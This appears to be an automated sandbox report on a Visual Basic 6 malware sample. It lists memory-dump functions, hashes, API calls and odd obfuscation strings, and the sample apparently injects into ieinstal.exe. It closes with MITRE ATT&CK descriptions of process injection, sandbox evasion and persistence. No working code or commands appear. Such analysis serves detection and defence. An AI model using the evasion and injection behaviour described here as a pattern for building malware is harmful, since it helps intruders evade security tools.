Function 0230452C, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1f82bd562c7f296408b8bd6512557556092952c0b0efe23ccedb02bb6724960
Instruction ID: e6cd9f100614eecd2f4642e242dd6517a939ef6171e022728511001cf2c6a414
Opcode Fuzzy Hash: b1f82bd562c7f296408b8bd6512557556092952c0b0efe23ccedb02bb6724960
Instruction Fuzzy Hash: 4C310972614345CFCB649F7098D6BA67BA0BF46214F4A095DDEC587598D3318187CF23

Uniqueness

Uniqueness Score: -1.00%

Function 023058BF, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24cd38b294a973450dc8f6a4fa97939951bdff18effa0f293d2da904a914f1bf
Instruction ID: 835f568d637b9496ede0744f1d65f8911e7297fc205c6a685921d0cdd22d47bc
Opcode Fuzzy Hash: 24cd38b294a973450dc8f6a4fa97939951bdff18effa0f293d2da904a914f1bf
Instruction Fuzzy Hash: 10214BB6B01A0B8BDF19CB64D8D6AA27B70BF4B3357584A84C0568FA69D331D043DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0230599C, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04570e649de4e3a3f8c4365443f6c0e329cd7d338e3c0959530a52ac30bfc511
Instruction ID: 082fe3e53f385b2e38826b0b0842d32df4788b3461c5b80a983f86ff0949597c
Opcode Fuzzy Hash: 04570e649de4e3a3f8c4365443f6c0e329cd7d338e3c0959530a52ac30bfc511
Instruction Fuzzy Hash: E021257260560A9FCB19DB60D8D6DD27B72FB4B2247994980C0468FA26D375D043CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02305859, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07198fd7657d7e17e8721267dab755e89d20023366598a66299796205c35095c
Instruction ID: c47b8b24a4f63ac4f6c3edf1ea7c794065f54e17fbf195045f188292f6f39a45
Opcode Fuzzy Hash: 07198fd7657d7e17e8721267dab755e89d20023366598a66299796205c35095c
Instruction Fuzzy Hash: 0F218B71515B469BC72A8F78C8C51AABB71FF87320B288BEDC1958F96AC3358047C791

Uniqueness

Uniqueness Score: -1.00%

Function 0230BDCB, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09310cde7cf0398f49c8d733fd8f2ff99b3c80836489205be8af204d42ffecfd
Instruction ID: 100bf9862ece25812a671d864ad36e60bbabc4bad2e9bc3e919791cc87dbada2
Opcode Fuzzy Hash: 09310cde7cf0398f49c8d733fd8f2ff99b3c80836489205be8af204d42ffecfd
Instruction Fuzzy Hash: EB1117356416489FCB35CF14C9E1AEAB7E2AF61B54F25801ACA498F261C330EA41CF25

Uniqueness

Uniqueness Score: -1.00%

Function 02303B3F, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f8ea7db8b3ee99bf8808ceefb32f2f8216390b90dd29ca80f681b80e263aefa
Instruction ID: 67ced8508135b08e3278df5194cd9b9977a7d69bf75c3ee2cee0f90ae15e9e8a
Opcode Fuzzy Hash: 7f8ea7db8b3ee99bf8808ceefb32f2f8216390b90dd29ca80f681b80e263aefa
Instruction Fuzzy Hash: 2AC02BCBE1802D3E07F1763479CC13708030280B3C3018E80102CE958DDC81CD4A087B

Uniqueness

Uniqueness Score: -1.00%

Function 023088B5, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50238e1f4544ce7a7ff381c2a5131c32eb80980a8e19664e6fc607eb4d6b6967
Instruction ID: bd45991c761a050555ac4f4033a2146286901649c592c55386b67faebb3db9c7
Opcode Fuzzy Hash: 50238e1f4544ce7a7ff381c2a5131c32eb80980a8e19664e6fc607eb4d6b6967
Instruction Fuzzy Hash: 6FC092FB221581CFEF42CB2CE892B4073A0FB64E48F0808D0E006CF722C228EE00CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00414A37, Relevance: 65.0, APIs: 30, Strings: 7, Instructions: 227COMMON

Download Yara Rule

APIs

__vbaSetSystemError.MSVBVM60(?,00000000), ref: 00414A92
#716.MSVBVM60(?,Ichthyosaurian,00000000,?,00000000), ref: 00414AAA
__vbaLateIdSt.MSVBVM60(?,00000000,00000000), ref: 00414ABF
__vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 00414AC7
__vbaSetSystemError.MSVBVM60(0038E45C,0033064C,?,?,00000000), ref: 00414AEE
__vbaNew2.MSVBVM60(00403528,004171A8,0038E45C,0033064C,?,?,00000000), ref: 00414B0D
__vbaObjSetAddref.MSVBVM60(?,?,0038E45C,0033064C,?,?,00000000), ref: 00414B22
__vbaHresultCheckObj.MSVBVM60(00000000,0233E9AC,00403518,00000010,?,00000000), ref: 00414B3D
__vbaFreeObj.MSVBVM60(?,00000000), ref: 00414B45
__vbaStrToAnsi.MSVBVM60(?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 00414B58
__vbaSetSystemError.MSVBVM60(00768003,00000000,?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 00414B6A
__vbaFreeStr.MSVBVM60(00768003,00000000,?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 00414B72
__vbaHresultCheckObj.MSVBVM60(00000000,?,004030F0,0000015C,?,00000000), ref: 00414BAB
__vbaStrCopy.MSVBVM60(00768003,00000000,?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 00414BB8
__vbaStrToAnsi.MSVBVM60(?,00000000,00768003,00000000,?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 00414BC2
__vbaSetSystemError.MSVBVM60(006A35AD,0017B19C,?,?,00000000,00768003,00000000,?,actinologue,0038E45C,0033064C,?,?,00000000), ref: 00414BDD
__vbaFreeStrList.MSVBVM60(00000002,?,?,006A35AD,0017B19C,?,?,00000000,00768003,00000000,?,actinologue,0038E45C,0033064C,?), ref: 00414BFC
__vbaVarDup.MSVBVM60 ref: 00414C1D
#600.MSVBVM60(?,00000002), ref: 00414C28
__vbaFreeVar.MSVBVM60(?,00000002), ref: 00414C32
__vbaSetSystemError.MSVBVM60(004EE518,?,005D2C9B), ref: 00414C4D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004030F0,00000254), ref: 00414C7B
__vbaStrToAnsi.MSVBVM60(?,Snackbaren,004EE518,?,005D2C9B), ref: 00414C89
__vbaStrToAnsi.MSVBVM60(?,AZEOTROPY,001A1689,00000000,?,Snackbaren,004EE518,?,005D2C9B), ref: 00414C9D
__vbaSetSystemError.MSVBVM60(00000000,?,AZEOTROPY,001A1689,00000000,?,Snackbaren,004EE518,?,005D2C9B), ref: 00414CAB
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,AZEOTROPY,001A1689,00000000,?,Snackbaren,004EE518,?,005D2C9B), ref: 00414CCA
__vbaVarDup.MSVBVM60(004EE518,?,005D2C9B), ref: 00414CEB
#529.MSVBVM60(?,004EE518,?,005D2C9B), ref: 00414CF4
__vbaFreeVar.MSVBVM60(?,004EE518,?,005D2C9B), ref: 00414CFC
__vbaFreeObj.MSVBVM60(00414D35,004EE518,?,005D2C9B), ref: 00414D2F

Strings

actinologue, xrefs: 00414B52
5GO, xrefs: 00414AD7
Ossifiers1, xrefs: 00414C0F
Snackbaren, xrefs: 00414C83
SUPERIMPENDING, xrefs: 00414BB0
Ichthyosaurian, xrefs: 00414AA4
AZEOTROPY, xrefs: 00414C97

Memory Dump Source

Source File: 00000002.00000002.313748813863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.313748778109.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.313748982678.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ErrorSystem$Ansi$CheckHresult$List$#529#600#716AddrefCopyLateNew2
String ID: 5GO$AZEOTROPY$Ichthyosaurian$Ossifiers1$SUPERIMPENDING$Snackbaren$actinologue
API String ID: 601719216-3463406768
Opcode ID: 97720039c6e9707af5c4ababeef6bf5ed38e4ebe0d531fb435aa299280c2e54e
Instruction ID: e7fbeced02998110f903cad3b4d2ba1fe3a458397f525936550412189d05ea61
Opcode Fuzzy Hash: 97720039c6e9707af5c4ababeef6bf5ed38e4ebe0d531fb435aa299280c2e54e
Instruction Fuzzy Hash: 65714FB1D40208AADB10EFE1C846ADEBBBCAF44705F60457FB501F71D2DB785A498A58

Uniqueness

Uniqueness Score: -1.00%

Function 0041484A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00403528,004171A8), ref: 00414889
__vbaHresultCheckObj.MSVBVM60(00000000,0233E9AC,00403518,00000014), ref: 004148AD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403538,00000138), ref: 004148D9
__vbaFreeObj.MSVBVM60(00000000,00000000,00403538,00000138), ref: 004148E1

Strings

KOMPROMITTERINGERNES, xrefs: 004148B7

Memory Dump Source

Source File: 00000002.00000002.313748813863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.313748778109.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.313748982678.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2
String ID: KOMPROMITTERINGERNES
API String ID: 4261391273-264330282
Opcode ID: 00e127226a097489f747f4e5bbe487aa8d8025a6e6205f8c14f008a24b78254d
Instruction ID: 91a96e9d06ff350200d1eba3150fe95f7c5d53d7e9db5e81d402b38113d6e13e
Opcode Fuzzy Hash: 00e127226a097489f747f4e5bbe487aa8d8025a6e6205f8c14f008a24b78254d
Instruction Fuzzy Hash: 09118270680344BFD710AFA5CD4AFEB7ABCEB15B55F10017EB101B71E1C6BC594586A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041491B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__vbaSetSystemError.MSVBVM60(00000000,00000000,?), ref: 0041495B
__vbaVarDup.MSVBVM60(00000000,00000000,?), ref: 0041497C
#600.MSVBVM60(?,00000002,00000000,00000000,?), ref: 00414987
__vbaFreeVar.MSVBVM60(?,00000002,00000000,00000000,?), ref: 00414991

Strings

klverens, xrefs: 0041496E

Memory Dump Source

Source File: 00000002.00000002.313748813863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.313748778109.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.313748982678.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#600ErrorFreeSystem
String ID: klverens
API String ID: 3931331424-2504283271
Opcode ID: 3b55207510589b2e942b96ca55b947f9ba51a54677e94ba41c5d81c2be0a67b0
Instruction ID: 785ba9432acc8f4502ba7e6c44af6ff5bab72de40073f0206222d6020c2e4907
Opcode Fuzzy Hash: 3b55207510589b2e942b96ca55b947f9ba51a54677e94ba41c5d81c2be0a67b0
Instruction Fuzzy Hash: 310112B0C11209BADB14DFA5C846BEEBABCEB48704F50816EF915B6190E77859048F69

Uniqueness

Uniqueness Score: -1.00%

Function 004149BB, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

#536.MSVBVM60(?), ref: 004149F4
__vbaStrMove.MSVBVM60(?), ref: 004149FE
__vbaFreeVar.MSVBVM60(?), ref: 00414A06
__vbaFreeStr.MSVBVM60(00414A24,?), ref: 00414A1E

Memory Dump Source

Source File: 00000002.00000002.313748813863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.313748778109.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.313748982678.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536Move
String ID:
API String ID: 2764857095-0
Opcode ID: 16800b94f94e13c2f52e92c2db50109ef6ea9bc903cf1771ad2379ac862c91ce
Instruction ID: 38bb64d32370a8bcc42eba7486e2c6a2be9ad4f77fcbc37a52c7d52853ddc88c
Opcode Fuzzy Hash: 16800b94f94e13c2f52e92c2db50109ef6ea9bc903cf1771ad2379ac862c91ce
Instruction Fuzzy Hash: 2DF01DB1950208ABD704EB95CA46FEEB7F8EB08744F60406EF001B25D1E7782E048A69

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ieinstal.exe PID: 7104 Parent PID: 872 ieinstal.exeCOMMON

Executed Functions

Function 030CED5C, Relevance: 3.1, APIs: 2, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 030CED2E
NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 030CEE35

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: cfaa4eb2839a6a9d885afcf67a5b8f750bade8195c51c2b6a70f667f6a971553
Instruction ID: b0440c00a3096d02bf9b110071eefa31d8719e1d4fdc36fafbc0ccf21b8411ea
Opcode Fuzzy Hash: cfaa4eb2839a6a9d885afcf67a5b8f750bade8195c51c2b6a70f667f6a971553
Instruction Fuzzy Hash: E32107B25133868FDB14CB64D8DEB9D7BA4BF0A366B0A0688C4465F2A6C375C442CA21

Uniqueness

Uniqueness Score: -1.00%

Function 030CECBD, Relevance: 3.1, APIs: 2, Instructions: 53sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 030CECAA
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 030CED2E

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: 1a2047d46deda6eed3e28279312adfa46c7b5f8679095b4cf2303c76a26b9368
Instruction ID: 710d3e7206b41f366f4ffa5ae3499cd5c176ddaa715e8b58dccb6680b88b460f
Opcode Fuzzy Hash: 1a2047d46deda6eed3e28279312adfa46c7b5f8679095b4cf2303c76a26b9368
Instruction Fuzzy Hash: 5A11E0B15513859FEB48CF21D8CEB98B7A5BF1536AF158588E0155F1B5C3B4C882CF21

Uniqueness

Uniqueness Score: -1.00%

Function 030CEC4F, Relevance: 3.0, APIs: 2, Instructions: 38sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 030CECAA
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 030CED2E

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: f64ff7d52501b06515cb8894e8488f7c179b6250fe28bcac010aede914b06e2e
Instruction ID: 5602bcafaabd1ac7ef8e77f0db65695c520d6c344f4eaa44138c50c0531fb38c
Opcode Fuzzy Hash: f64ff7d52501b06515cb8894e8488f7c179b6250fe28bcac010aede914b06e2e
Instruction Fuzzy Hash: FC017CB04123C09FE7499F25C99DB9CB7A5AF10366F16818CE9559F0B6C7748C81CF21

Uniqueness

Uniqueness Score: -1.00%

Function 030CEDB8, Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 030CEE35

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 91d0bac5ea0afb3c59fdc9a2d6cc0525907bfcf796e4254914229e55ed6f5b3f
Instruction ID: 424c40b884ea8b35b09695012ba6b60c64d24de23722ef0f966b880d9974ab91
Opcode Fuzzy Hash: 91d0bac5ea0afb3c59fdc9a2d6cc0525907bfcf796e4254914229e55ed6f5b3f
Instruction Fuzzy Hash: 9C1126B26123868FDB14CB64CDCAB9E7BA0AF4A22570907D8C4579B2F6C360C002D721

Uniqueness

Uniqueness Score: -1.00%

Function 030CED4E, Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 030CEE35

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 865e488f5890a5aed1e9554434f9539a6f3b8f2411bb365a398d847f4dbcad75
Instruction ID: 682addbb7e93dfaca23ab1149ab23aa2dd5912bd3c4654f59290a3a127cd3498
Opcode Fuzzy Hash: 865e488f5890a5aed1e9554434f9539a6f3b8f2411bb365a398d847f4dbcad75
Instruction Fuzzy Hash: 381108B22223408FD350CF68C9C1B9E7A94AF193A5F0946A4D9478B2F3C774D441CA11

Uniqueness

Uniqueness Score: -1.00%

Function 030CEE3A, Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 030CEE35

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6bc46a87b142cc884da4cee6272fab0fcbdf7bb93be284782d9e847c3da6c9b1
Instruction ID: 5c49ef600a4d01f5e825c589e3d214f8c10d04031f1632a7ae24500f747e828d
Opcode Fuzzy Hash: 6bc46a87b142cc884da4cee6272fab0fcbdf7bb93be284782d9e847c3da6c9b1
Instruction Fuzzy Hash: 791129F3A423468FDB14CB64D4CAA997BA0BE1B3693454AC8C49B9F2B6D7B1C002D610

Uniqueness

Uniqueness Score: -1.00%

Function 030CED49, Relevance: 1.6, APIs: 1, Instructions: 53nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 030CEE35

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f4a8720b8d63281dc5121c6ea346e621b2fa05c7b8f128cef2bda50d34c6e29f
Instruction ID: f709d14fbd9c5c314b6430706073163b108df6e7e2f089e0a8ec405ee14d8514
Opcode Fuzzy Hash: f4a8720b8d63281dc5121c6ea346e621b2fa05c7b8f128cef2bda50d34c6e29f
Instruction Fuzzy Hash: 48110875112380DFD314CF68C9C5B9E7A94EF09361F4A4298D9479B2F3C734D841CA11

Uniqueness

Uniqueness Score: -1.00%

Function 030CEA24, Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 030CEA7E

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a4fe748a2463b009ae180f45aa14d9e4801e75612ca72a833e9baa47e9464fc7
Instruction ID: ce4287387c93387030c19b8a68260ca9ecd82be3b43a0bb616d428fd6c007cd3
Opcode Fuzzy Hash: a4fe748a2463b009ae180f45aa14d9e4801e75612ca72a833e9baa47e9464fc7
Instruction Fuzzy Hash: 742138B561A3C6CFCF64CF64D8CA99D77A0FB4A312F494A9AC4C90B225C3359445C712

Uniqueness

Uniqueness Score: -1.00%

Function 030CE9DE, Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 030CEA7E

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: f05ed9f09c276ecf2b8700b5b58cb822197327fe6803663ff503c1a41832a430
Instruction ID: 79674b1275fb999dd5e1a9ff098a75ec3d20b68b6d678dfd2f594425cfc26657
Opcode Fuzzy Hash: f05ed9f09c276ecf2b8700b5b58cb822197327fe6803663ff503c1a41832a430
Instruction Fuzzy Hash: 5C11E175118382CBCBA0CF38C8C8BAAB7F0FF85301F45566AD9894B665D7395585C712

Uniqueness

Uniqueness Score: -1.00%

Function 030CEAA0, Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 030CEA7E

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 8a1f24a6d5694425f2c12405471c0abcb73d4aa9c3d8f3d8904c95c809ed4667
Instruction ID: be9cbad593840ef7d7a43411773c359b4deb11ba2c9238a384282e5e8c8647e0
Opcode Fuzzy Hash: 8a1f24a6d5694425f2c12405471c0abcb73d4aa9c3d8f3d8904c95c809ed4667
Instruction Fuzzy Hash: E31108B26113878FDF54CF14D4DEE9977A5BB4A22AB498A98C08A0F664C632D446C711

Uniqueness

Uniqueness Score: -1.00%

Function 030CEC4A, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 030CECAA

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ee9f7406b58a8d8ba37b7965b4510e9c88579b97d0653b50cef58c2731a75173
Instruction ID: 4dfef2b86787b1708f72124b090fe395e41d5308ff00d8bdefc7be250757d420
Opcode Fuzzy Hash: ee9f7406b58a8d8ba37b7965b4510e9c88579b97d0653b50cef58c2731a75173
Instruction Fuzzy Hash: 1CE0EC741263C09FD745EB10C6DDB5C76A15F84312F1A8598D5094E0A3C7208C82C621

Uniqueness

Uniqueness Score: -1.00%

Function 030CEC85, Relevance: 1.3, APIs: 1, Instructions: 16sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 030CECAA
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 030CED2E

Memory Dump Source

Source File: 00000006.00000002.318236593668.00000000030CE000.00000040.00000001.sdmp, Offset: 030CE000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: 91e396a1866ab44d4318107131ab18965f1b56a93921ee563c6b55b88d4c10fb
Instruction ID: 2774db55d585096c20c1a776e79a633520728f0efb70a79f571d27bdf0b43caa
Opcode Fuzzy Hash: 91e396a1866ab44d4318107131ab18965f1b56a93921ee563c6b55b88d4c10fb
Instruction Fuzzy Hash: EBE0E2702557819FE748DB15C9CEB18BBA2AF0970AF1A84E8D1099E0A68371C886CA20

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

